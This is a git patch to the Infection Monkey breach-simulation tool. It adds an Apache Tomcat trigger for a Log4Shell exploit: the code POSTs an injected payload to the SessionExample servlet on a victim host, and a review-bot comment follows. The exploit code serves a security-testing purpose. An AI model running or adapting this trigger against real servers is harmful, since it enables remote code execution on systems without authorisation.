From 79d92afcd43306f30628f905a81ec8223c007f12 Mon Sep 17 00:00:00 2001
From: Ilija Lazoroski
Date: Thu, 6 Jan 2022 13:56:17 +0100
Subject: [PATCH] Agent: Add Apache Tomcat support for Log4Shell exploit
---
 .../service_exploiters/__init__.py | 3 ++-
 .../service_exploiters/tomcat.py | 21 +++++++++++++++++++
 2 files changed, 23 insertions(+), 1 deletion(-)
 create mode 100644 monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py
index 8122f2505..96823c894 100644
--- a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/__init__.py
@@ -3,7 +3,8 @@ from typing import List
 from .exploitable_service import IExploitableService
 from .poc_docker import DockerPOCExploit
 from .solr import SolrExploit
+from .tomcat import TomcatExploit
 def get_log4shell_service_exploiters() -> List[IExploitableService]:
- return [DockerPOCExploit(), SolrExploit()]
+ return [DockerPOCExploit(), SolrExploit(), TomcatExploit()]
diff --git a/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
new file mode 100644
index 000000000..bfabdd854
--- /dev/null
+++ b/monkey/infection_monkey/exploit/log4shell_utils/service_exploiters/tomcat.py
@@ -0,0 +1,21 @@
+from logging import getLogger
+
+import requests
+
+from infection_monkey.exploit.log4shell_utils.service_exploiters import IExploitableService
+from infection_monkey.model import VictimHost
+
+logger = getLogger(__name__)
+
+
+class TomcatExploit(IExploitableService):
+ service_name = "Apache Tomcat"
+
+ @staticmethod
+ def trigger_exploit(payload: str, host: VictimHost, port: int):
+ url = f"http://{host.ip_addr}:{port}/examples/servlets/servlet/SessionExample"
+ payload = {"dataname": "foo", "datavalue": payload}
+ try:
+ resp = requests.post(url, data=payload, timeout=5, verify=False) # noqa DUO123
+ except requests.ReadTimeout as e:
+ logger.debug(f"Log4shell request failed {e}")
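Review bot: `verify=False` does nothing in `trigger_exploit` because the URL is hard-coded to `http://`, so the `# noqa DUO123` only silences the certificate-verification lint and would keep hiding it if the scheme ever became configurable. The call can be `requests.post(url, data=payload, timeout=5)`, which also drops the unused `resp`. The `except` catches only `requests.ReadTimeout`, so a refused connection or a connect timeout propagates out of the method; whether the caller handles that is not visible in this hunk, and `except requests.RequestException as e:` would keep the failure local and logged. The class also lacks a docstring saying that the request goes to the bundled `/examples` webapp, for instance `"""Posts the payload to Tomcat's SessionExample servlet; hosts without the examples webapp are not covered."""`, so that an empty result is not read as the host being unaffected.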